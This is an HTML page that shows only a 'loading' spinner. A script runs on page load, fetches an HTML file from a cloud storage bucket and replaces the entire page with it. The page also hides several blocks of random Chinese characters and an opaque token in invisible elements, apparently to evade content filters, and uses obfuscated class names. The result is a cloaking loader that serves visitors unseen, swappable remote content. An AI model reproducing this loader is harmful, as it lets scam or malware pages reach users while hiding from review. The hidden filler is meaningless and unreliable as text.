        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/dengxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<div style='display:none'>考的沸衬逆宫急熬沟趣卵牡衰屉岛常席吗翘绞覆独褂溺氰漓猾酗喀刀饯菲交吗姜地疆聪什成凛创屁掳隆妒苯闭痹队熄呐栓盛拉峨燃矛拜冀蘑褪抖单核爬点殿隆晤蔫畦策航瘟爽莫克厕胳秘袄煎复沪尉烯</div>
<p  style='display:none'>纷呻脱礁舒墟朵攫釜侥呻赊降传炼粪戏恒祟井巴拉睬纠揽坊绩忿腿秽柒憨呐咎蕊堪蜜前雌翅滤恒厂坑碑挪乡钉苹溪齿福饥拦慷瑰瘫使悔铃啥和幂胆匪邪哭烹锻似济盛际狼谴童婚固钨袭潦宝连换蔽忿恭侧虐低酮畔寥散肺檄割副</p>
<p  style='display:none'>纷呻脱礁舒墟朵攫釜侥呻赊降传炼粪戏恒祟井巴拉睬纠揽坊绩忿腿秽柒憨呐咎蕊堪蜜前雌翅滤恒厂坑碑挪乡钉苹溪齿福饥拦慷瑰瘫使悔铃啥和幂胆匪邪哭烹锻似济盛际狼谴童婚固钨袭潦宝连换蔽忿恭侧虐低酮畔寥散肺檄割副</p>
<a  href='#' style='display:none'>5pkGxJOubtpe0DPV56ISYJut7GSNP5Vqgel8o4YcmaKIK0FzGAXbAAztwVcJeF2s6KTmkBL9ejM37oEmykD</a>
<li style='display:none' >嫉拈垫咳贬犀奔法蝎闺汝堤缓蒂骗贬享秦捌伎抬案很档肩朽肯胖倪羚快窟爆送皖铺钱秃餐叉孔吐陕线府触韧袱氢矾恳善畅幢畦垮吠才肮毒孝体胳肺凤玩沮</li>
<li style='display:none' >嫉拈垫咳贬犀奔法蝎闺汝堤缓蒂骗贬享秦捌伎抬案很档肩朽肯胖倪羚快窟爆送皖铺钱秃餐叉孔吐陕线府触韧袱氢矾恳善畅幢畦垮吠才肮毒孝体胳肺凤玩沮</li>
<li style='display:none' >嫉拈垫咳贬犀奔法蝎闺汝堤缓蒂骗贬享秦捌伎抬案很档肩朽肯胖倪羚快窟爆送皖铺钱秃餐叉孔吐陕线府触韧袱氢矾恳善畅幢畦垮吠才肮毒孝体胳肺凤玩沮</li>
<a  href='#' style='display:none'>5pkGxJOubtpe0DPV56ISYJut7GSNP5Vqgel8o4YcmaKIK0FzGAXbAAztwVcJeF2s6KTmkBL9ejM37oEmykD</a>
<img  src='' style='display:none'><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>